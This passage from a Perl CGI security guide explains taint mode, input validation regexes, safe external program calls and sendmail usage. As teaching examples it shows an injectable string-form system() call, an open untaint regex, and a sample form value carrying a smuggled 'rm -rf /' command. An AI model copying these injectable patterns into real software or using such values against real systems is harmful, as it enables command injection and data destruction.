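    (my $printable = $value) =~ s/[^\x20-\x7e]/?/g;

    my $remote = defined $ENV{REMOTE_ADDR} ? $ENV{REMOTE_ADDR} : 'unknown';
    warn "REJECTED INPUT from $remote: $field=[$printable]\n";
    return;
}
```

Swapping warn for die in the helper would stop the script at the first rejected value instead of continuing.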
Additionally, the Extropia::Log classes may be useful in this case. For example, Extropia::Log::Composite can allow multiple types of logging to occur given multiple log objects.
There is another reason to use an if statement to check if the taint
regular expression match failed or not. The special variable
$1 will remain set to the last successful match if the current
regular expression was unsuccessful. Thus, if you are doing several regular
expression checks such as these, you may get subtle errors in the program
if you do not explicitly check if the match failed or not.
For example, the $1 left over from an earlier successful regex could be
picked up after a later, failed regex for a completely different variable.
If an email regex succeeded before a firstname regex failed, the firstname
variable would end up being assigned the $1 from the email match.
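The stale $1 problem can be reproduced in a few lines. The sample values and variable names below are invented for illustration.

```perl
use strict;
use warnings;

my $email     = 'homer@simpsons.com';
my $firstname = '!!!';    # no word characters, so its check will fail

# The first check succeeds and sets $1.
$email =~ /\A(\w[\w.-]*\@[\w.-]+)\z/;
my $clean_email = $1;

# The second check fails, but $1 still holds the value from the email match.
$firstname =~ /\A(\w+)\z/;
my $wrong_firstname = $1;

# Using the result of the match avoids the stale value: a failed match in
# list context returns an empty list, so $safe_firstname stays undefined.
my ($safe_firstname) = $firstname =~ /\A(\w+)\z/;
```

Either an explicit if around the match or the list-context form keeps a failed check from silently reusing an earlier capture.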
Why Not Just Clear Taint Mode With An Open Regular Expression?
DON'T DO THIS!!!
Perl usually has a good reason for thinking the input is unsafe. For
example, there is a common misconception that HIDDEN INPUT tags on an HTML
form that are generated by a CGI script are ``safe''. This is not true
because a user could easily mimic your form by making their own HTML form
with bogus values. A programmer who blindly untaints HIDDEN INPUT tag values
will be in hot water if someone does end up spoofing the values.
Taint mode will catch all this. Avoid the temptation to quickly dismiss a
tainted variable by using an ``open'' Regular expression. This cannot be
emphasized enough.
THE FOLLOWING CODE IS DANGEROUS AND SHOULD NOT BE DONE:
    $email =~ /(.*)/;
    $email = $1;
This pattern will match any input. Thus, effectively no check has actually
been done. Yet the $email variable has been untainted.
Apart from the mantra that you should never blindly choose a completely
open regular expression such as .* to untaint a value, you will typically
still be faced with some choice as to how to create a regular expression to
untaint your variable.
At minimum, we know that we should filter out shell meta characters that
might be interpreted badly by an external system call. There are two
different ways to come up with a regular expression: rejection of
characters and the acceptance of characters.
It is natural to think that we should write an untaint expression based on
the rejection of characters we deem 'bad'. This will usually 'work' in the
practical sense of the word. However, while you are untainting, you should
consider honing your regular expression around the specific data that you
are attempting to validate.
By approaching the regular expression from the point of view of accepting
only characters that are valid for the data being untainted, you strengthen
the regular expression so that it doubles as a data validation routine.
This is important because logic errors may crop up in a program where bad
data is placed in a value by a user. To avoid logic errors due to hacking,
it is best to hone the regular expression around accepting only those
characters that make sense for the data you are dealing with while at the
same time filtering all the typical shell meta characters.
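The difference between the two approaches can be sketched with a hypothetical form field that is supposed to hold a five-digit ZIP code. Both function names and the list of rejected characters are assumptions made for this example.

```perl
use strict;
use warnings;

# Rejection style: anything free of the listed shell metacharacters and
# whitespace passes, whether or not it looks like a ZIP code.
sub untaint_by_rejection {
    my ($raw) = @_;
    return $raw =~ /\A([^;&|<>`'"\\\$\s]+)\z/ ? $1 : undef;
}

# Acceptance style: only exactly five digits pass, so the pattern doubles
# as a data validation routine.
sub untaint_by_acceptance {
    my ($raw) = @_;
    return $raw =~ /\A([0-9]{5})\z/ ? $1 : undef;
}
```

Both functions turn away a value such as `90210; rm -rf /`, but only the acceptance version also turns away `not-a-zip`, which is harmless to a shell yet still wrong for the program's logic.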
Recall that Perl considers $1 to be safe now because it trusts
that you tested the validity of the variable using the regular expression.
Perl cannot and does not judge your regular expression. If you choose to
make it too loose like the above regular expression, then Perl will let
you.
If you do this, you are shortchanging the point of taint mode, which is to
make you sit down and think ``What input do I really want and how do I
restrict myself to just that set of characters?''.
There are two potentially unsafe operations that tend to cause the most
problems with taint mode activated. The first is the execution of external
programs and the other is loading code to evaluate. To troubleshoot these
operations it is important to understand where taint mode evolved from.
Taint mode has been around longer than CGI scripts have been around. So you
might ask yourself why was taint mode placed in Perl?
Part of Perl's origins came from systems administration. Unfortunately,
SysAdmin scripts usually need to be run as a privileged user such as root.
Thus, Perl was endowed with the power of taint mode in order to make
writing systems administration scripts more secure.
Unfortunately, this means that taint mode is frequently more paranoid than
we would like for CGI scripts. This is because SysAdmin scripts were
assumed capable of being executed directly from a UNIX shell. This is less
secure because a user has a great deal of control over the environment of
the UNIX shell including the ability to change the path that executables
are located in.
On the other hand, a web server provides a more secure environment because
users who run a CGI script do not have the capability of changing the
script's search path information.
One example of this is the PATH environment variable. While taint mode is
on, Perl refuses to run an external program as long as PATH still holds the
value inherited from the environment. This means that we must clear out the
path (or set it to a known, safe value) and use absolute paths inside of
system calls and other external program calls in Perl using taint mode.
This restriction makes sense for a SysAdmin script where a user could
change the PATH environment variable at will and then run the SysAdmin
script with potentially changed behavior.
This level of paranoia makes less sense for CGI programs. However, paranoia
is what taint mode is all about and it is relatively easy to fix this issue
by configuring your script to use absolute paths.
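A minimal sketch of that fix follows. The directory list is an assumption; a script should name only the directories it really needs. Removing the other shell-related variables follows the advice given in Perl's own security documentation (perlsec).

```perl
use strict;
use warnings;

# Assumed directories; adjust for your own system.
$ENV{PATH} = '/bin:/usr/bin';

# Other environment variables that can change how a shell behaves.
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};

# Hypothetical external call, written with an absolute path:
# system('/bin/date') == 0 or warn "date failed: $?\n";
```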
Likewise, when taint mode is on, the current directory is no longer
considered valid for loading library or module files. Again, this is
paranoid behavior assuming that we could place our own subversive version
of a library in the current directory in order to change the behavior of a
SysAdmin script. However, CGI scripts called from a browser do not have to
worry about arbitrary code being uploaded to a server. If this is possible
on your web server, then you have a lot more problems to worry about.
But like the PATH problem, this library issue is easy to resolve as well.
If you wish to add library search paths from the current working directory
simply use the 'use lib' pragma. The following code would add back the
current working directory plus a Modules directory underneath it to the
library search path.
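A statement of this kind can be sketched as follows. The directory name Modules comes from the text; the exact form of the statement is an assumption.

```perl
use strict;
use warnings;

# Add the current working directory and ./Modules to the module search path.
use lib qw(. ./Modules);
```

Because use lib takes effect at compile time, any later use or require statement in the script will search these directories as well.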
Before leaving this section, we'll provide a few take home messages about
taint mode.
First, consider logging bad taint/regular expression matches. If you are
writing applications which use this module set, please consider utilizing
the log feature in order to record the situation in which users enter bad
data in your forms.
Second, use the Web Server's error log. The error log is there to catch
errors. Even if you are not worried about taint mode problems occurring,
you should be checking the error log vigilantly in case other errors are
occurring. Remember, taint mode is not a security panacea. Logic errors in
your code can result in security issues as well.
Don't Rely Solely on Regular Expressions
This leads us to our third and most important taint mode point. Never trust
taint mode to do your work for you. You must always consider all logical
flows through your program and consider whether you want them allowed.
Always consider security a top priority.
For example, earlier we gave an example of untainting an email address.
This is all very well, but it is a very generic untaint operation. What if
your application must be more secure than that?
What if you only want to allow certain domains to be emailed or a certain
list of email users? If this is the case, then you should always write the
most strict code possible. Make sure that only those email addresses can be
mailed and no others. Otherwise you may be opening your program up to
unexpected behavior.
Unexpected behavior is undesirable. Avoid it at all costs.
However, this does not mean that you should make your program inflexible.
If you want to limit email addresses, do not hard code the email addresses
in your program. Instead, consider placing an array of valid email
addresses in the setup file so that your valid email list can be changed
later on.
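As a rough sketch of this idea, the list of permitted addresses can live in one array that the setup file defines, with a small function to consult it. The variable name, the function name, and the example.com addresses are all hypothetical.

```perl
use strict;
use warnings;

# Hypothetical setup-file variable: the only addresses that may be mailed.
my @allowed_recipients = (
    'support@example.com',
    'sales@example.com',
);

# Build a lookup table once; addresses are compared case-insensitively.
my %is_allowed = map { ( lc($_) => 1 ) } @allowed_recipients;

sub recipient_allowed {
    my ($email) = @_;
    return 0 unless defined $email;
    return exists $is_allowed{ lc $email } ? 1 : 0;
}
```

The program then mails an address only when recipient_allowed() returns true, and changing who may be mailed means editing the array rather than the program logic.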
Avoid Needing to Untaint in the First Place
In addition, avoid passing user-supplied variables to external programs at
all if you can help it, even once they are untainted. In our mail example,
we passed the email address to the mail program on the command-line.
However, there are two better ways of doing this.
First, we can avoid passing the email address as a command line parameter
entirely by simply using a different mail program. For example, the UNIX
sendmail program has an option (-t) that makes it read the recipient
addresses from the headers of the message supplied on STDIN.
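The STDIN approach might be sketched like this. The path /usr/sbin/sendmail and both function names are assumptions, and the check for line breaks in header values is an added precaution rather than something described in the text.

```perl
use strict;
use warnings;

# Assumed location of the sendmail binary; adjust for your system.
my $SENDMAIL = '/usr/sbin/sendmail';

# Build the message text. Header values must not contain line breaks,
# otherwise a user could smuggle in extra headers.
sub build_message {
    my ($to, $subject, $body) = @_;
    for my $header ($to, $subject) {
        die "Line break in header value\n" if $header =~ /[\r\n]/;
    }
    return "To: $to\nSubject: $subject\n\n$body\n";
}

# Hand the message to sendmail on STDIN. With -t, sendmail takes the
# recipient from the To: header, so the address never appears on the
# command line. The list form of open() does not go through a shell.
sub send_message {
    my ($to, $subject, $body) = @_;
    my $message = build_message($to, $subject, $body);
    open(my $mail, '|-', $SENDMAIL, '-t', '-oi')
        or die "Cannot run $SENDMAIL: $!\n";
    print {$mail} $message;
    close($mail) or die "sendmail reported a problem: $?\n";
    return 1;
}
```

Only send_message() touches the external program, so the message construction can be checked on its own without sending any mail.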
A second thing we can do is call the mail program by passing the email
address as a parameter array instead of a single string to the
system() call. When a single string is passed to
system() Perl passes the string to the shell for processing
the command-line parameters. Unfortunately, as we have seen, this means we
must filter out shell metacharacters.
If the command-line parameters are passed to the system() call
as an array of parameters, the system() call will not parse
them using the shell, and so we can safely pass shell metacharacters in the
email address. For example, the following system() command is
unsafe if the email address is still tainted.
    system("mail " . $cgi->param("email"));
However, we can mitigate this by passing the parameter as an element of the
array of parameters instead of one concatenated string. The following code
snippet illustrates this method of calling system().
    system("mail",$cgi->param("email"));
It turns out that there is a very good reason that we may not wish to pass
email addresses that have been untainted by the regular expression we
explained earlier. The problem is that if we use the regular expression we
discussed previously to untaint variables, we will potentially miss out on
some email addresses. The reason for this is that our regular expression
was too restrictive.
Valid email addresses on the Internet allow such shell metacharacters as /,
&, and %. Consider the & character. Just like the semi-colon
discussed previously, & can be used to separate commands. Thus, if we
expand the email untaint regular expression to include &, to allow an
address like homer&marge@simpsons.com, we are potentially opening up a hole. Consider the following command:
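As an illustration of the kind of command meant here (the mail program name and the exact command line are assumptions), the sketch below builds the single-string form and shows where a shell would divide it at the & character. Nothing is executed.

```perl
use strict;
use warnings;

my $address = 'homer&marge@simpsons.com';

# Single-string form: this is the text a shell would be asked to parse.
my $command = "mail $address";

# A shell treats an unquoted & as a command separator, so it would see
# two commands instead of one. The split below only mimics that division.
my @seen_by_shell = split /&/, $command;
```

Here the shell would run `mail homer` and then try to run something called `marge@simpsons.com`, which is not what the program intended.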
This is very similar to the command where we used the semi-colon as a shell
metacharacter command delimiter previously. While it is true that this
scenario is hard to run across, you should take to heart that it is
difficult to anticipate what shell metacharacter combination might be
called into action.
Avoid the 'Russian Dolls' Scenario
A final piece of advice in taint mode security is to avoid the ``Russian
Dolls'' scenario. You should not just think about your program and the
program you are passing a tainted variable to. You should also consider all
the subsequent programs that might be called.
Usually this is not a problem. But what if it is? In the last taint mode
tip, we mentioned that there was a way to call sendmail by passing the
email address through STDIN instead of on the command line. This is much
safer because then shell escape characters will not get interpreted in
STDIN.
Or will they?
What if, behind the scenes, the sendmail binary actually called another
program and passed it command line parameters using the email address? If
this was the case, our previously 'secure' solution would be cracked wide
open.
Is this far fetched? Maybe yes. It turns out that the standard sendmail
binary does not suffer from this ``Russian Doll'' scenario.
However, history does repeat itself. While unlikely, it is not entirely out
of the question that an ISP running a third party sendmail system would
wish to write a sendmail program that converts calls to sendmail to the new
third-party mail system. It is conceivable that mistakes might be made in
this bridging code even to the extent of passing previously safe variables
as command line parameters to the new system.
While this is an unlikely scenario for sendmail, wrapper programs exist
everywhere. This is why scripting, especially Perl scripting, is so
popular. One Perl program can act as a glue for many other programs. It is
Perl’s strength.
Thus, you might think you are securely calling one program, but if that
program in turn calls many other programs, you should be aware of how it is
doing it. For example, not everyone else's Perl scripts you might call will
use taint mode. And not everyone writes in Perl, so taint mode may not even
be available to them as a tool. Always consider the entire path that your
variable will take when you pass it along to another program.
[ TOC ]
Has all of this given you a headache yet? To some degree it should.
Security is serious business. At least take solace in the fact that many
people are like us, mere mortals. It does not take a security genius to
look at every CGI script to make sure it is secure.
Rather, it takes some amount of vigilance on your part and also on the part
of everyone else using your source code to make sure your programs are
secure. It's not a matter of a one time security check either. New exploits
are published all the time, and subsequently new fixes are published all
the time.
To some degree, publishing your code for others to review is the best thing
you can do to help ensure safe CGI. The more you use objects that have been
checked over by a community of programmers, the more you can rely on the
program being free of bugs, including security bugs.
Master Copy URL: http://www.extropia.com/support/docs/adt/
Copyright © 2000-2001 Extropia. All rights reserved.
Written by eXtropia. Last Modified at 09/20/2001